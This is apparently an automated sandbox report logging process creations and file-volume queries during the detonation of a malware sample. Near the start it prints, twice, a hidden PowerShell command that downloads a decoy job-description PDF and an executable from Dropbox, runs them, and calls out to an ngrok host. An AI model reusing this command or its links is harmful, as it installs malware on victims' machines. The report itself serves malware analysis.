                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\aff7310e-e430-4b16-86a8-ee19b2c5c7f2.pdf
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe "C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe"
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -noprofile -command "$randompdf = join-path -path $env:temp -childpath ('{0}.pdf' -f ([guid]::newguid())); $randomexe = join-path -path $env:temp -childpath ('{0}.exe' -f ([guid]::newguid())); invoke-webrequest -uri 'https://www.dropbox.com/scl/fi/zswwoz1nsshfdhbgdi9dy/documents-about-company-information-and-job-descriptions-4.pdf?rlkey=xb4z4b9qljepnpiu5mkjz888q&dl=1' -outfile $randompdf; start-process -filepath 'msedge.exe' -argumentlist '--kiosk', $randompdf; invoke-webrequest -uri 'https://www.dropbox.com/scl/fi/uv9rtex94bi18x6hfwnvm/runner.exe?rlkey=ohh5enlv6dylr9jqxqwsffkja&dl=1' -outfile $randomexe; start-process -filepath $randomexe; if (test-path $randomexe) { invoke-webrequest -uri 'https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/metadata/f08a7638d48ba191b651003837c0a34d'; }"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -noprofile -command "$randompdf = join-path -path $env:temp -childpath ('{0}.pdf' -f ([guid]::newguid())); $randomexe = join-path -path $env:temp -childpath ('{0}.exe' -f ([guid]::newguid())); invoke-webrequest -uri 'https://www.dropbox.com/scl/fi/zswwoz1nsshfdhbgdi9dy/documents-about-company-information-and-job-descriptions-4.pdf?rlkey=xb4z4b9qljepnpiu5mkjz888q&dl=1' -outfile $randompdf; start-process -filepath 'msedge.exe' -argumentlist '--kiosk', $randompdf; invoke-webrequest -uri 'https://www.dropbox.com/scl/fi/uv9rtex94bi18x6hfwnvm/runner.exe?rlkey=ohh5enlv6dylr9jqxqwsffkja&dl=1' -outfile $randomexe; start-process -filepath $randomexe; if (test-path $randomexe) { invoke-webrequest -uri 'https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/metadata/f08a7638d48ba191b651003837c0a34d'; }"
                      Source: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exeCode function: 25_2_00460FA0 cpuid 25_2_00460FA0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
